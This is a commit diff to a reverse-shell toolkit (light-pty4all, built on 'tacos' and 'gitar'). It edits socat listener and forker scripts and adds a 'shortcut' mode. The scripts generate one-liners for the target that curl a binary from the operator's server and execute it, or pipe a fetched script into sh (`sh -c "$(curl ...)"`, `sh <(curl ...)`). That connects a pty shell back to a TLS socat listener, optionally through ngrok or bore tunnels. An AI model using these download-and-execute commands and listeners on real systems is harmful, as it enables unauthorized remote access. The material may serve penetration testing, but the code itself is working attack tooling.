Shorcut and cleaning

.gitignore

@@ -1,5 +1,8 @@
-light-pty4all/server*
-light-pty4all/socat-listener.sh
-light-pty4all/socat-listener-windows.sh
+/light-pty4all/server*
+light-pty4all/socat-forker.sh
+light-pty4all/socat-forker-windows.sh
 go.sum
-vendor
+vendor
+server*
+/tacos
+/sh

light-pty4all/socat-forker.sh.tpl

@@ -12,7 +12,7 @@ while test ! -e ${SOCKF}; do sleep 1; done
 SOCAT_TTY=$(tty)
 
 # space for no history, gitar shortcut
-echo " $(gitar --dry-run -a GITAR_HOST -p GITAR_PORT)" > ${SOCAT_TTY}
+echo " $(gitar --dry-run -e GITAR_HOST -p GITAR_PORT -s GITAR_SECRET)" > ${SOCAT_TTY}
 echo " clear" > ${SOCAT_TTY}
 
 # Use socat to ship data between the unix socket and STDIO.

light-pty4all/socat-listener-behind-tunneling.sh

@@ -2,6 +2,8 @@
 
 # From https://github.com/laluka/pty4all
 
+SHORTCUT=true
+
 for i in "$@"; do
  case $i in
  --lport|-p)
@@ -19,8 +21,8 @@ for i in "$@"; do
  --windows|-w)
  WINDOWS=true
  ;;
- --++|--aas)
- AAS=true
+ --no-shortcuts|-N)
+ SHORTCUT="" # ~ setting at false
  ;;
  --help|-h)
  HELP=true
@@ -87,7 +89,7 @@ if [[ $NGROK ]]; then
  ## launch ngrok
  echo "[+] Launch bore tunneling"
  tmux split-window -v "ngrok tcp ${WEBPORT}"
- sleep 3 # wait for ngrok to start
+ sleep 4 # wait for ngrok to start
  NGROK_ENDPOINT_TCP=$(curl --silent --show-error http:https://127.0.0.1:4040/api/tunnels | jq -r ".tunnels[0].public_url")
  # NGROK_ENDPOINT="http:$(echo $NGROK_ENDPOINT_TCP | cut -d ":" -f 2-3)"
  NGROK_ENDPOINT="$(echo $NGROK_ENDPOINT_TCP | cut -d ':' -f 2-3 | cut -d '/' -f 3-)"
@@ -104,19 +106,21 @@ else
  NGROK_ENDPOINT_TCP = "${BORE_ENDPOINT}"
 fi
 
-#gitar shortcut + launch gitar
+#launch gitar
 echo "[+] launch gitar server"
 SECRET=$RANDOM
 tmux split-window -h "gitar -a https://${TUNNEL_ENDPOINT} -f ${LPORT} --secret ${SECRET}" # https??
 URL="http:https://${TUNNEL_ENDPOINT}/${SECRET}"
 
-
-if [[ ! $WINDOWS ]]; then
- echo "[+] gitar shortcuts enabled on reverse shell"
- sed -i "s/GITAR_PORT/${WEBPORT}/g" ${SCRIPT}
- URL_WITHOUT_SLASH=$(echo "$URL" | tr / ~)
- sed -i "s,GITAR_HOST,${URL},g" ${SCRIPT} #Fix, I need -a and not -e # Use another delimeter for sed to have / in url
-fi
+## gitar shortcut are not possible as we will call shutdown on gitar (=> no more http server)
+# disable gitar shortcut
+sed -i "/GITAR_SECRET/d" ${SCRIPT}
+# if [[ ! $WINDOWS ]]; then
+# echo "[+] gitar shortcuts enabled on reverse shell"
+# sed -i "s/GITAR_PORT/${WEBPORT}/g" ${SCRIPT}
+# URL_WITHOUT_SLASH=$(echo "$URL" | tr / ~)
+# sed -i "s,GITAR_HOST,${URL},g" ${SCRIPT} #Fix, I need -a and not -e # Use another delimeter for sed to have / in url
+# fi
 
 # put tacos in current directory
 PWD=$(pwd)
@@ -138,18 +142,20 @@ SHUTDOWN_URL="${URL}/shutdown"
 
 # LISTEN
 REMOTE_CMD=""
+
 if [[ "$WINDOWS" ]]; then
  REMOTE_CMD="curl -O $DOWNLOAD_URL && curl $SHUTDOWN_URL && .\\${BINARY} ${TUNNEL_ENDPOINT}"
 else
  REMOTE_CMD="curl -s -O $DOWNLOAD_URL && curl $SHUTDOWN_URL && chmod +x ${BINARY} && ./${BINARY} ${TUNNEL_ENDPOINT}"
 fi
 
-## as a Service? ie even shorter shortcut
-if [[ "$AAS" ]]; then
+## with shorter shortcut?
+if [[ "$SHORTCUT" ]]; then
  ## Write file for gitar
- echo "${REMOTE_CMD}" > aas
- AAS_URL="${URL}/pull/aas"
- REMOTE_CMD="\ncurl ${AAS_URL} |sh\nsh -c \"\$(curl ${AAS_URL})\"\nsh <(curl ${AAS_URL})"
+ echo "${REMOTE_CMD}" > sh
+ SHORTCUT_URL="${URL}/pull/sh"
+ REMOTE_CMD="\nsh -c \"\$(curl ${SHORTCUT_URL})\"\nsh <(curl ${SHORTCUT_URL})"
+ #curl ${SHORTCUT_URL} |sh\n does not work due to /pkg/tacos/tacos.go:94
 fi
 
 echo

light-pty4all/socat-listener.sh

@@ -1,6 +1,7 @@
 #!/bin/bash
 
 # From https://github.com/laluka/pty4all
+SHORTCUT=true
 
 for i in "$@"; do
  case $i in
@@ -22,6 +23,9 @@ for i in "$@"; do
  --windows|-w)
  WINDOWS=true
  ;;
+ --no-shortcuts|-N)
+ SHORTCUT="" # ~ setting at false
+ ;;
  *) 
  ;;
  esac
@@ -72,18 +76,21 @@ cp ${SCRIPT}.tpl ${SCRIPT}
 
 # HTTP server launch
 if [[ "$GITAR" ]]; then
- #gitar shortcut is not available with windows
+ echo "[+] launch gitar server"
+ SECRET=$RANDOM
+ tmux split-window -h "gitar -e ${LHOST} -p ${WEBPORT} --secret ${SECRET}"
+ ## Load gitar shortcuts (gitar shortcut is not available with windows, in fact --dry-run is,not yet implemented)
  if [[ ! $WINDOWS ]]; then
  echo "[+] gitar shortcuts enabled on reverse shell"
+ sed -i "s/GITAR_SECRET/${SECRET}/g" ${SCRIPT}
  sed -i "s/GITAR_PORT/${WEBPORT}/g" ${SCRIPT}
  sed -i "s/GITAR_HOST/${LHOST}/g" ${SCRIPT}
  fi
- echo "[+] launch gitar server"
- SECRET=$RANDOM
- tmux split-window -h "gitar -e ${LHOST} -p ${WEBPORT} --secret ${SECRET}"
 else
  echo "[+] gitar shortcuts not enabled"
  tmux split-window -h "python3 -m http.server ${WEBPORT}"
+ # disable gitar shortcut
+ sed -i "/GITAR_SECRET/d" ${SCRIPT}
 fi
 
 # put tacos in current directory
@@ -108,11 +115,33 @@ fi
 
 
 # LISTEN
+REMOTE_CMD=""
+
+if [[ "$WINDOWS" ]]; then
+ REMOTE_CMD="curl -O $DOWNLOAD_URL && .\\${BINARY} ${LHOST}:${LPORT}"
+else
+ REMOTE_CMD="curl -s -O $DOWNLOAD_URL && chmod +x ${BINARY} && ./${BINARY} ${LHOST}:${LPORT}"
+fi
+
+## with shorter shortcut?
+if [[ "$SHORTCUT" ]]; then
+ ## Write file for gitar
+ echo "${REMOTE_CMD}" > sh
+ SHORTCUT_URL="http:https://${LHOST}:${WEBPORT}"
+ if [[ "$GITAR" ]]; then
+ SHORTCUT_URL="${SHORTCUT_URL}/${SECRET}/pull/sh"
+ else
+ SHORTCUT_URL="${SHORTCUT_URL}/sh"
+ fi
+ REMOTE_CMD="\nsh -c \"\$(curl ${SHORTCUT_URL})\"\nsh <(curl ${SHORTCUT_URL})"
+ #curl ${SHORTCUT_URL} |sh\n does not work due to /pkg/tacos/tacos.go:94
+fi
+
 echo
 if [[ "$WINDOWS" ]]; then
- echo "(🪟) curl -O $DOWNLOAD_URL && .\\${BINARY} ${LHOST}:${LPORT}"
+ echo -e "(🪟) ${REMOTE_CMD}"
  socat OPENSSL-LISTEN:${LPORT},cert=server.pem,verify=0,reuseaddr,fork EXEC:${SCRIPT},pty
 else
- echo "(🐧) curl -O $DOWNLOAD_URL && chmod +x ${BINARY} && ./${BINARY} ${LHOST}:${LPORT}"
+ echo -e "(🐧) ${REMOTE_CMD}"
  socat OPENSSL-LISTEN:${LPORT},cert=server.pem,verify=0,reuseaddr,fork EXEC:${SCRIPT},pty,raw,echo=0
 fi